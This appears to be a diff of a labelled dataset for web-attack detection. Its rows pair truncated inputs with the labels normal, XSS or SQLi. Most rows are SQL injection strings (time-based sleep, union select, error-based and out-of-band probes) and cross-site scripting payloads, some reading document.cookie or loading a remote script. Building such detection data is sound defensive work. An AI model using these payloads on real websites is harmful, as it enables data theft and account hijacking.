BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10495 <svg><script>&#x61;lert(1)</script></svg>,1,XSS,191 -Save up to 30% on select solar panels and electric,0,normal,25716 -"1%"" ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( (",2,SQLi,21473 +Save up to 30% off select Outdoor DÃ��cor and Essent,0,normal,25718 +1'|| ( select 'fqoz' where 9794 = 9794 union all s,2,SQLi,21475 "<div style=""font-family:'foo&#10;;color:red;';"">XX",1,XSS,700 -"{""id"":null,""name"":""VenusaurMega Venusaur""}",0,normal,27291 -"-8772%"" ) union all select 5433,5433,5433,5433,543",2,SQLi,16991 -1' order by 1#,2,SQLi,12469 +"{""id"":null,""firstName"":""Han"",""lastName"":""Tan"",""spe",0,normal,27290 +"-7171%' ) ) union all select 5580,5580,5580,5580,5",2,SQLi,16993 +"-1963 union all select 6831,6831,6831,6831,6831,68",2,SQLi,12471 "<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCR",1,XSS,302 -"<li oncontextmenu=""alert(1)"">test</li>",1,XSS,3421 -"1"" ) ) ) or 8421 = ( select count ( * ) from gener",2,SQLi,18712 -"&lt;A HREF=\""javascript&#058;document&#46;location",1,XSS,1061 -"1' or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,14435 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10758 -"<label draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,3445 -"-6086"" union all select 8700,8700,8700,8700--",2,SQLi,17454 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10717 -"1' and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,18590 -Only a select handful of politicians get parodied ,0,normal,25820 -Where did you find that peaceful garden?,0,normal,23724 -<style>:target {color:red;}</style><center id=x st,1,XSS,8209 -"<abbr oncontextmenu=""alert(1)"">test</abbr>",1,XSS,7680 -or WAITFOR DELAY '0:0:5'--,2,SQLi,11313 -"<IMG LOWSRC=""javascript:alert('')"">",1,XSS,4643 -Select a fragrance for the perfume.,0,normal,24068 -"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,12947 -*{background:url(xx:x //**/\red/*)} /* IE 6-7 Stan,1,XSS,9008 -<pre onpointerleave=alert(1)>XSS</pre>,1,XSS,7997 -<meta onblur=alert(1) tabindex=1 id=x></meta><inpu,1,XSS,5601 -"<div id=""91"">[A]",1,XSS,9152 -x000003C,1,XSS,7023 -"-7499%"" ) union all select 1893,1893,1893,1893,189",2,SQLi,21278 -"1"" ) as kdvb where 2651 = 2651 and 6240 = ( 'qqpjq",2,SQLi,15637 -"1 ) and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,16610 -1 ) where 5550 = 5550 ( select ( case when ( 5451 ,2,SQLi,19739 -"<listing oncontextmenu=""alert(1)"">test</listing>",1,XSS,5896 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10678 -"?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCgn",1,XSS,8755 -"<form onmouseover=""alert(1)"">test</form>",1,XSS,3437 -select ( case when ( 7005 = 7118 ) then 1 else 700,2,SQLi,14566 -1'|| ( select 'xsoq' from dual where 6690 = 6690 a,2,SQLi,14374 -1 ) where 7165 = 7165 and sleep ( 5 ) #,2,SQLi,18078 -<style>:target {color:red;}</style><sup id=x style,1,XSS,6894 -"1%"" or ( select 9173 from ( select count ( * ) ,co",2,SQLi,17430 --7971 ) ) as armw where 9474 = 9474 or make_set ( ,2,SQLi,19831 --5774' where 3632 = 3632 or ( 3177 = 4222 ) *4222-,2,SQLi,12758 -"<video><track default onload=alert(1) src=""data:te",1,XSS,8051 -"<div id=""84""><x xmlns:ev=""http://www.w3.org/2001/x",1,XSS,9147 -"<isindex onmousemove=""alert(1)"">test</isindex>",1,XSS,4556 -"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AN",2,SQLi,11297 -"<meter draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,4736 -select ( case when ( 1014 = 4280 ) then 1014 else ,2,SQLi,20881 -"<IMG SRC=x oncanplay=""alert(String.fromCharCode(88",1,XSS,1219 -1'+ ( select 'lpkv' where 8760 = 8760,2,SQLi,13447 -"1"" ) or 4411 = ( select count ( * ) from sysusers ",2,SQLi,22400 -Here are some photos and select translations from ,0,normal,26104 -"<embed oncut=""alert(1)"" contenteditable>test</embe",1,XSS,3988 -1 where 6494 = 6494 and 8463 = 2760,2,SQLi,21296 -"Migne's texts are not always satisfactory, but sin",0,normal,25877 -"-5738"" ) as efbn where 8541 = 8541 union all selec",2,SQLi,20878 -Identify columns where necessary.,0,normal,23329 -"<caption draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,5700 -Select assist.,0,normal,24737 -"1%"" ) ) and 8407 = ( select count ( * ) from gener",2,SQLi,13993 -"1"" ) where 2445 = 2445",2,SQLi,17341 -"<ol draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,2870 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11970 -"1 ) ) procedure analyse ( extractvalue ( 5840,conc",2,SQLi,20818 -1'|| ( select 'irfn' where 8360 = 8360,2,SQLi,21358 -"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171",2,SQLi,14208 -"<input onmouseleave=""alert(1)"">test</input>",1,XSS,2962 --5124'+ ( select 'xpww' where 1752 = 1752 union al,2,SQLi,14173 -"<meta onclick=""alert(1)"">test</meta>",1,XSS,2201 -1 ) rlike ( select * from ( select ( sleep ( 5 ) ),2,SQLi,16483 -"<colgroup draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,5593 -"<plaintext onmouseleave=""alert(1)"">test</plaintext",1,XSS,2558 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,15587 -Select your destination.,0,normal,24830 --2204'|| ( select 'bwae' from dual where 4884 = 48,2,SQLi,20584 -<button onMouseWheel=javascript:alert(1)>,1,XSS,9638 -"<bgsound onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,5540 -"1"" ) ) ) or exp ( ~ ( select * from ( select conca",2,SQLi,18033 -"1' or row ( 1045,7562 ) > ( select count ( * ) ,co",2,SQLi,12875 -1' and 8514 = ( select count ( * ) from domain.dom,2,SQLi,12184 -Clinton has also paid careful attention to select ,0,normal,26273 -Order a fresh salad.,0,normal,22582 -<ruby id=x tabindex=1 onfocusin=alert(1)></ruby>,1,XSS,6296 -<noframes onpointerup=alert(1)>XSS</noframes>,1,XSS,4500 -<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#000,1,XSS,1155 -1' and 3580 = ( select count ( * ) from domain.dom,2,SQLi,18640 --5518 ) as yvqm where 7360 = 7360 union all select,2,SQLi,15152 -"?getURLValue=javascript:alert(1)"",",1,XSS,9875 -1' where 7176 = 7176,2,SQLi,19555 -<fieldset id=x tabindex=1 onactivate=alert(1)></fi,1,XSS,7401 -ORDER BY 7--,2,SQLi,10249 -"<area onpaste=""alert(1)"" contenteditable>test</are",1,XSS,7159 -"-1434' ) ) union all select 4734,4734,4734,4734,47",2,SQLi,19493 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20933 -"1' where 9003 = 9003 and make_set ( 5868 = 8316,83",2,SQLi,14590 -"<dialog onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,5424 -<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><in,1,XSS,2050 -"1"" rlike ( select ( case when ( 5552 = 1712 ) then",2,SQLi,13169 -"select * from users where id = 1 union select @ _,",2,SQLi,11836 -"1' ) ) ) union all select null,null,null,null,null",2,SQLi,16372 -<img alt='%></xmp><img src=xx:x onerror=aler,1,XSS,9209 -"Up tp 40% off select Fossil, Micheal Kors Watches ",0,normal,25200 -"{""id"":null,""name"":""Ducklett""}",0,normal,27343 -"1"" ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ",2,SQLi,14076 --5470' ) ) or ( 8459 = 8459 ) *4906 and ( ( 'oeam',2,SQLi,16647 -1' ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ),2,SQLi,20446 -"1 ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,21919 -"1%' ) and extractvalue ( 7982,concat ( 0x5c,0x7171",2,SQLi,14487 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,14258 -"<img draggable=""true"" ondrag=""alert(1)"">test</img>",1,XSS,6617 -<plaintext id=x tabindex=1 onbeforeactivate=alert(,1,XSS,8121 -<listing onpointerout=alert(1)>XSS</listing>,1,XSS,8156 -<del id=x tabindex=1 onactivate=alert(1)></del>,1,XSS,1803 -<col onpointerleave=alert(1)>XSS</col>,1,XSS,4737 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11112 -<section id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,2386 -Join team.,0,normal,23079 -<style>:target {color: red;}</style><output id=x s,1,XSS,5760 -"1"" ) where 5850 = 5850 or 1022 = ( select count ( ",2,SQLi,18344 -1 ) as zdym where 1578 = 1578 union all select nul,2,SQLi,19361 -<svg><frameset onload=alert(1)></frameset>,1,XSS,8681 -1' ) ) ) or 1022 = ( select count ( * ) from all_u,2,SQLi,18228 -%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22,1,XSS,1735 -<nextid id=x tabindex=1 onfocus=alert(1)></nextid>,1,XSS,2912 -select * from users where id = '1' or \<\ union se,2,SQLi,11412 -"<listing onmouseenter=""alert(1)"">test</listing>",1,XSS,8339 -<time onblur=alert(1) tabindex=1 id=x></time><inpu,1,XSS,1987 -It'll also only be live at select locations for ea,0,normal,25946 -"<option draggable=""true"" ondragend=""alert(1)"">test",1,XSS,6547 -"-2734' ) union all select 5510,5510,5510,5510,5510",2,SQLi,14244 -Where's your car?,0,normal,23483 -<code onpointerover=alert(1)>XSS</code>,1,XSS,2812 -1 where 7516 = 7516 union all select null#,2,SQLi,17044 -An impartial committee to select the final list of,0,normal,26371 -"1"" ) ) ) and ( 7758 = 4628 ) *4628 and ( ( ( ""wzas",2,SQLi,15709 -"1"" ) ) as qqhm where 7182 = 7182",2,SQLi,18896 -"select * from users where id = 1 or "" ) 1"" or 1 = ",2,SQLi,11590 -"1' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex (",2,SQLi,20667 -<x contenteditable onkeypress=alert(1)>press any k,1,XSS,9340 -VIDGO will also offer live local stations in selec,0,normal,25185 -Merge the data tables.,0,normal,22672 -select sleep ( 5 ) and ( ( ( 'rzjf' = 'rzjf,2,SQLi,15088 -"and 1 = ( if ( ( load_file ( char ( 110,46,101,120",2,SQLi,11775 -<track id=x tabindex=1 onfocusin=alert(1)></track>,1,XSS,1931 -Where's the fire department?,0,normal,23510 +"<style>@keyframes slidein {}</style><cite style=""a",1,XSS,3423 +1%' ) ) rlike sleep ( 5 ) #,2,SQLi,18714 +"&lt;A HREF=\""http&#58;//www&#46;gohttp&#58;//www&#",1,XSS,1062 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,14437 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10760 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3447 +1 or 9643 = ( select count ( * ) from domain.domai,2,SQLi,17456 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10719 +-9120' ) ) or 8571 = 8571--,2,SQLi,18592 +Only a select few anticipated this much pain for t,0,normal,25822 +Where's the best place to watch the sunset?,0,normal,23726 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8211 +"<section ondblclick=""alert(1)"">test</section>",1,XSS,7682 +and WAITFOR DELAY '0:0:5'--,2,SQLi,11315 +"<dir onkeyup=""alert(1)"" contenteditable>test</dir>",1,XSS,4645 +Select a meditation technique to try.,0,normal,24070 +1' ) ) as dcen where 5852 = 5852 or ( select * fro,2,SQLi,12949 +"*{color:red}</style>//[""'`-->]]>]</div>",1,XSS,9010 +<track id=x tabindex=1 ondeactivate=alert(1)></tra,1,XSS,7999 +<html onfocusout=alert(1) tabindex=1 id=x></html><,1,XSS,5603 +"<div id=""94""><svg xmlns=""http://www.w3.org/2000/sv",1,XSS,9154 +<i onpointerover=alert(1)>XSS</i>,1,XSS,7025 +"1%"" ) and 4595 = 4595#",2,SQLi,21280 +"1%"" ) and 8635 = ( select count ( * ) from generat",2,SQLi,15639 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,16612 +"1%"" ) ) and elt ( 7633 = 4110,4110 ) and ( ( ""%"" =",2,SQLi,19741 +<colgroup id=x tabindex=1 onfocus=alert(1)></colgr,1,XSS,5898 +UNION ALL SELECT NULL--,2,SQLi,10680 +"<style>@keyframes x{}</style><img style=""animation",1,XSS,8757 +"<template onmouseover=""alert(1)"">test</template>",1,XSS,3439 +"1 ) where 7815 = 7815 union all select null,null,n",2,SQLi,14568 +1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ),2,SQLi,14376 +"1' where 2391 = 2391 union all select null,null,nu",2,SQLi,18080 +"<figcaption onkeydown=""alert(1)"" contenteditable>t",1,XSS,6896 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,17432 +"waitfor delay '0:0:5' and ( ( ""ykgm"" = ""ykgm",2,SQLi,19833 +"1"" ) where 7165 = 7165 or 8466 = benchmark ( 50000",2,SQLi,12760 +"<acronym onbeforepaste=""alert(1)"" contenteditable>",1,XSS,8053 +"<div id=""88""><svg xmlns=""http://www.w3.org/2000/sv",1,XSS,9149 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4558 +"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1",2,SQLi,11299 +<applet id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,4738 +"1%"" ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 )",2,SQLi,20883 +"<IMG SRC=x oncanplaythrough=""alert(String.fromChar",1,XSS,1220 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,13449 +1' ) where 6634 = 6634 or 8466 = benchmark ( 50000,2,SQLi,22402 +Head over to Amazon and save $50 on select Fitbits,0,normal,26106 +<b onpointerdown=alert(1)>XSS</b>,1,XSS,3990 +"1"" and 7533 = 7533 and ""btak"" like ""btak",2,SQLi,21298 +Merck's PM approach to select patients may have ma,0,normal,25879 +"1"" ) as iwri where 4921 = 4921 or ( select * from ",2,SQLi,20880 +Find data where valid.,0,normal,23331 +<fieldset onpointerleave=alert(1)>XSS</fieldset>,1,XSS,5702 +Select care.,0,normal,24739 +"select sleep ( 5 ) and ( ( ""vzye"" = ""vzye",2,SQLi,13995 +1 where 4940 = 4940,2,SQLi,17343 +"<time onkeydown=""alert(1)"" contenteditable>test</t",1,XSS,2871 +"admin"" ) or ""1"" = ""1""--",2,SQLi,11972 +1 where 8966 = 8966,2,SQLi,20820 +"-5840' ) or elt ( 1032 = 1032,3623 )",2,SQLi,21360 +"1"" where 5440 = 5440 and 8189 = ( select count ( *",2,SQLi,14210 +"<dialog oncopy=""alert(1)"" contenteditable>test</di",1,XSS,2963 +1 ) as hvsk where 7902 = 7902,2,SQLi,14175 +"<dialog onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2202 +-9331' or ( 4519 = 2912 ) *2912 and 'rddk' = 'rddk,2,SQLi,16485 +<form onpointerover=alert(1)>XSS</form>,1,XSS,5595 +"<shadow onmousedown=""alert(1)"">test</shadow>",1,XSS,2559 +1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 w,2,SQLi,15589 +Select your route.,0,normal,24832 +1' ) as qqyz where 2274 = 2274,2,SQLi,20586 +<button onMoveEnd=javascript:alert(1)>,1,XSS,9640 +"<style>@keyframes x{}</style><form style=""animatio",1,XSS,5542 +1%' ) ) or 5356 = ( select count ( * ) from sysuse,2,SQLi,18035 +1'|| ( select 'goen' from dual where 8586 = 8586,2,SQLi,12877 +"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,12186 +Click to start the upstroke Click on the upstroke ,0,normal,26275 +Update the weather forecast.,0,normal,22584 +/?param=<javascript:alert(document.cookie>),1,XSS,6298 +"<em onmouseup=""alert(1)"">test</em>",1,XSS,4502 +"exp/*<A STYLE='no\xss:noxss(""*//*"");",1,XSS,1156 +"-5027%"" ) ) or 5903 = ( 'qqpjq'|| ( select case 59",2,SQLi,18642 +"-6618"" ) ) ) order by 1#",2,SQLi,15154 +"?pg=javascript:alert(1)"",",1,XSS,9877 +1' ) ) and 9660 = ( select count ( * ) from all_us,2,SQLi,19557 +"<image onpaste=""alert(1)"" contenteditable>test</im",1,XSS,7403 +ORDER BY 9--,2,SQLi,10251 +"<image onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,7161 +"1"" ) or 8315 = ( select count ( * ) from sysibm.sy",2,SQLi,19495 +1'|| ( select 'ubza' where 2576 = 2576,2,SQLi,20935 +( select ( case when ( 8130 = 5894 ) then 8130 els,2,SQLi,14592 +"<td onclick=""alert(1)"">test</td>",1,XSS,5426 +"<rp onmousemove=""alert(1)"">test</rp>",1,XSS,2051 +"1"" ) ) as sdlv where 5922 = 5922 and 2006 = 2006",2,SQLi,13171 +select * from users where id = '1' <@$_ or 1 = 1 -,2,SQLi,11838 +1' ) or 8315 = ( select count ( * ) from sysibm.sy,2,SQLi,16374 +"<img src=""javascript:alert(2)"">",1,XSS,9211 +Up to 80% off select furniture and decor (through ,0,normal,25202 +"{""id"":null,""firstName"":""Sean"",""lastName"":""Choo"",""s",0,normal,27342 +"1"" ) as hblk where 7982 = 7982 and 9611 = 6142--",2,SQLi,14078 +-4583' ) as evbo where 6055 = 6055 union all selec,2,SQLi,16649 +"-6126 union all select 8486,8486,8486,8486,8486,84",2,SQLi,20448 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,21921 +select ( case when ( 3344 = 8103 ) then 3344 else ,2,SQLi,14489 +"1 ) where 7600 = 7600 union all select null,null,n",2,SQLi,14260 +<html onpointerup=alert(1)>XSS</html>,1,XSS,6619 +<shadow id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,8123 +"<sup oncut=""alert(1)"" contenteditable>test</sup>",1,XSS,8158 +"<svg onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,1804 +"<svg oncontextmenu=""alert(1)"">test</svg>",1,XSS,4739 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11114 +<select autofocus onfocus=alert(1)>,1,XSS,2387 +Update image.,0,normal,23081 +<meta onpointerup=alert(1)>XSS</meta>,1,XSS,5762 +if ( 5127 = 2829 ) select 5127 else drop function ,2,SQLi,18346 +1' ) ) and 6510 = ( select count ( * ) from sysuse,2,SQLi,19363 +"<picture onmouseout=""alert(1)"">test</picture>",1,XSS,8683 +"-2359' union all select 2687,2687,2687#",2,SQLi,18230 +; alert(document.cookie); var foo=',1,XSS,1736 +"<picture onkeyup=""alert(1)"" contenteditable>test</",1,XSS,2913 +select * from users where id = 1 ||1 union select ,2,SQLi,11414 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8341 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1988 +"It will go on sale in ""select markets"" later this ",0,normal,25948 +"<dfn onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,6549 +"-7559"" or 8792 = 6905--",2,SQLi,14246 +Where's the party?,0,normal,23485 +"<del onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,2813 +1 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr,2,SQLi,17046 +An attempt has been made to select an asymmetric u,0,normal,26373 +1'|| ( select 'pzoe' where 2977 = 2977 and elt ( 3,2,SQLi,15711 +1 ) ) as qgma where 7675 = 7675 rlike ( select * f,2,SQLi,18898 +select * from users where id = '1' union select !<,2,SQLi,11592 +1'|| ( select 'npel' from dual where 5258 = 5258,2,SQLi,20669 +<x contenteditable onpaste=alert(1)>paste here!,1,XSS,9342 +VICE: How did you select the photographers in the ,0,normal,25187 +Plant some tall trees.,0,normal,22674 +"1"" ) union all select null,null,null,null,null--",2,SQLi,15090 +"select * from users where id = 1 or ""_ ) "" or 1 = ",2,SQLi,11777 +"<div onmouseleave=""alert(1)"">test</div>",1,XSS,1932 +Where's the university?,0,normal,23512 "avascript:alert(1)"">XSS</a>",1,XSS,198 -background-image:\0075\0072\006C\0028'\006a\0061\0,1,XSS,7778 -"-3228"" ) or ( 5901 = 1570 ) *1570 and ( ""egdd"" = """,2,SQLi,19316 -<article id=x tabindex=1 onfocus=alert(1)></articl,1,XSS,8005 -<style>:target {color: red;}</style><select id=x s,1,XSS,2328 -"<big onkeydown=""alert(1)"" contenteditable>test</bi",1,XSS,4390 -Then they use data analysis to select their ideal ,0,normal,25343 -1%' and 7533 = 7533 and '%' = ',2,SQLi,12689 -"1"" and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,20603 -"select * from users where id = 1 or 1#""; union sel",2,SQLi,11448 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7780 +"select * from generate_series ( 7762,7762,case whe",2,SQLi,19318 +<u onpointerup=alert(1)>XSS</u>,1,XSS,8007 +<br onpointerover=alert(1)>XSS</br>,1,XSS,2329 +<svg><label onload=alert(1)></label>,1,XSS,4392 +Then scroll down to Viewing Restrictions and selec,0,normal,25345 +1' ) as eymt where 3911 = 3911 or 4411 = ( select ,2,SQLi,12691 +1'|| ( select 'vwls' where 5252 = 5252 rlike sleep,2,SQLi,20605 +"""a"""" or 1 = 1--""",2,SQLi,11450 "<a href=""java&NewLine;script:alert(1)"">XSS</a>",1,XSS,203 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,19895 -<style>:target {color:red;}</style><form id=x styl,1,XSS,4932 -1 ) where 5333 = 5333 or 9643 = ( select count ( *,2,SQLi,21920 -"But I'm unable to select ""Exit Game"" from the menu",0,normal,26310 -<link onpointerenter=alert(1)>XSS</link>,1,XSS,5792 -"{""id"":null,""firstName"":""Joel"",""lastName"":""Azul"",""a",0,normal,27354 -"1' ) ) ) or row ( 1045,7562 ) > ( select count ( *",2,SQLi,18092 -select sleep ( 5 ) # yrpn,2,SQLi,21557 -"-8065"" ) ) ) order by 1--",2,SQLi,21634 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13950 -Insert the SIM card into your new phone.,0,normal,22913 -<dfn id=x tabindex=1 onbeforeactivate=alert(1)></d,1,XSS,7393 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5856 -Select shop.,0,normal,24549 +"1"" ) where 1024 = 1024 and 2716 = ( select count (",2,SQLi,19897 +"<iframe oncopy=""alert(1)"" contenteditable>test</if",1,XSS,4934 +1 ) ) ) and 6969 = ( select 6969 from pg_sleep ( 5,2,SQLi,21922 +But I was always one of a select few black student,0,normal,26312 +"<fieldset draggable=""true"" ondragstart=""alert(1)"">",1,XSS,5794 +"{""id"":null,""name"":""perhaps""}",0,normal,27358 +"1%' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( '%",2,SQLi,18094 +"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,21559 +"1 ) or extractvalue ( 1297,concat ( 0x5c,0x7171706",2,SQLi,21636 +"1' in boolean mode ) and elt ( 4249 = 4249,7259 ) ",2,SQLi,13952 +Create a lasting memory with your loved ones.,0,normal,22915 +<style>:target {color: red;}</style><ruby id=x sty,1,XSS,7395 +"<template onbeforecopy=""alert(1)"" contenteditable>",1,XSS,5858 +Select mall.,0,normal,24551 <script ^__^>alert(String.fromCharCode(49))</scrip,1,XSS,855 -"1"" or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,13878 -1' where 9156 = 9156 and char ( 111 ) ||char ( 77 ,2,SQLi,14556 -<applet id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,4738 -1,0,normal,26737 -1' ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||,2,SQLi,17083 -"-5779 ) union all select 6089,6089--",2,SQLi,20081 -"<;DIV STYLE="";background-image:\0075\0072\006C\002",1,XSS,1637 -Where's the mental health clinic?,0,normal,23665 -Where did you find that cozy bookstore?,0,normal,23939 -select * from users where id = '1' or \.<1 union s,2,SQLi,11650 -select ( case when ( 9434 = 2780 ) then 9434 else ,2,SQLi,19966 -1' ) ) and 3707 = ( select count ( * ) from sysibm,2,SQLi,17676 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6586 -1' ) ) order by 1#,2,SQLi,13809 -"1"" ) as kzuq where 4259 = 4259",2,SQLi,18238 -"-8258"" ) ) as swjp where 2681 = 2681 union all sel",2,SQLi,21617 -1' ) where 2840 = 2840,2,SQLi,20148 -"<main draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,3305 --9327' ) or 3038 = 3038,2,SQLi,17880 -"<bdo draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7995 -"<style>@keyframes x{}</style><ins style=""animation",1,XSS,1999 +"1"" ) ) as puws where 7006 = 7006",2,SQLi,13880 +"1%' ) ) procedure analyse ( extractvalue ( 9627,co",2,SQLi,14558 +"<element onmousemove=""alert(1)"">test</element>",1,XSS,4740 +1,0,normal,26739 +1 ) ) as hpxw where 1826 = 1826 union all select n,2,SQLi,17085 +1' ) ) ) and 5934 = 2309,2,SQLi,20083 +<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x,1,XSS,1638 +I wonder where my favorite book went.,0,normal,23667 +He picked a bouquet of flowers from the garden.,0,normal,23941 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11652 +1' ) ) ) union all select null#,2,SQLi,19968 +1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ,2,SQLi,17678 +<i id=x tabindex=1 onactivate=alert(1)></i>,1,XSS,6588 +1' ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,13811 +1' in boolean mode ) and ( 8610 = 2985 ) *2985#,2,SQLi,18240 +1' ) as gxpb where 7107 = 7107 or exp ( ~ ( select,2,SQLi,21619 +"1 ) ) or ( select 9173 from ( select count ( * ) ,",2,SQLi,20150 +"<isindex x=""javascript:"" onmouseover=""alert()"">",1,XSS,3307 +begin user_lock.sleep ( 5 ),2,SQLi,17882 +<pre onpointerleave=alert(1)>XSS</pre>,1,XSS,7997 +"<dl onmouseout=""alert(1)"">test</dl>",1,XSS,2000 "<img src\x09=x onerror=""javascript:alert(1)"">",1,XSS,664 -"-7423 or make_set ( 9354 = 9354,7185 ) -- hprc",2,SQLi,13546 -<col onblur=alert(1) tabindex=1 id=x></col><input ,1,XSS,3749 -"1"" ) ) as upvg where 4826 = 4826",2,SQLi,20798 -<style>:target {color:red;}</style><canvas id=x st,1,XSS,5531 -1' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ),2,SQLi,21960 -Tickets go on sale for select shows on April 83.,0,normal,25286 -"<bgsound onkeyup=""alert(1)"" contenteditable>test</",1,XSS,7527 -javascript\x0A:javascript:alert(1),1,XSS,9475 -"1' union all select null,null,null,null,null,null,",2,SQLi,22249 -"{""id"":null,""name"":""Mink""}",0,normal,27252 -<svg><cite onload=alert(1)></cite>,1,XSS,6777 -""">><marquee><h1>XSS</h1></marquee>",1,XSS,1307 -I'm considering where to go for a leisurely stroll,0,normal,23777 -"{""id"":null,""name"":""Electrode""}",0,normal,26814 -",execute immediate 'sel' || 'ect us' || 'er'",2,SQLi,11495 --2456' ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( 'b,2,SQLi,21977 -1 where 8102 = 8102 and 9198 = 9198--,2,SQLi,15708 -AS INJECTX WHERE 1=1 AND 1=1,2,SQLi,10231 -Head over to Amazon and save $50 on select Fitbits,0,normal,26106 -"1' in boolean mode ) and 8148 = like ( 'abcdefg',u",2,SQLi,18048 -select ( case when ( 3773 = 3722 ) then 3773 else ,2,SQLi,21835 -hi or a=a,2,SQLi,10174 --5866' ) ) as phzq where 3803 = 3803 union all sel,2,SQLi,16158 +"1%"" and extractvalue ( 7982,concat ( 0x5c,0x717170",2,SQLi,13548 +<SCRIPT SRC=//.rocks/.j>,1,XSS,3751 +1'|| ( select 'ptfi' from dual where 2234 = 2234 a,2,SQLi,20800 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5533 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,21962 +Tick Replace Start button and select Custom button,0,normal,25288 +"<figcaption draggable=""true"" ondragleave=""alert(1)",1,XSS,7529 +\xE2\x81\x9Fjavascript:javascript:alert(1),1,XSS,9477 +-6778 ) as xutm where 6442 = 6442 union all select,2,SQLi,22251 +"{""id"":null,""name"":""Kangaroo""}",0,normal,27255 +"<slot onmousemove=""alert(1)"">test</slot>",1,XSS,6779 +"<META HTTP-EQUIV=\""refresh\"" CONTENT=\""0;url=javas",1,XSS,1308 +Where did you find that cozy cafe?,0,normal,23779 +"{""id"":null,""firstName"":""Gin Ying"",""lastName"":""Ho"",",0,normal,26816 +select * from users where id = 1 <@ or 1 = 1 -- 1,2,SQLi,11497 +"1"" ) ) ) rlike ( select ( case when ( 7689 = 7689 ",2,SQLi,21979 +1' ) where 1646 = 1646 or 9643 = ( select count ( ,2,SQLi,15710 +AS INJECTX WHERE 1=1 AND 1=1#,2,SQLi,10233 +He wrote Practical Sermons (1858; edited by Noah P,0,normal,26108 +"-3710 ) ) union all select 5770,5770,5770,5770,577",2,SQLi,18050 +"1' ) ) union all select null,null--",2,SQLi,21837 +password:*/=1--,2,SQLi,10176 +1' ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5,2,SQLi,16160 "{""id"":null,""name"":""Kadabra""}",0,normal,27556 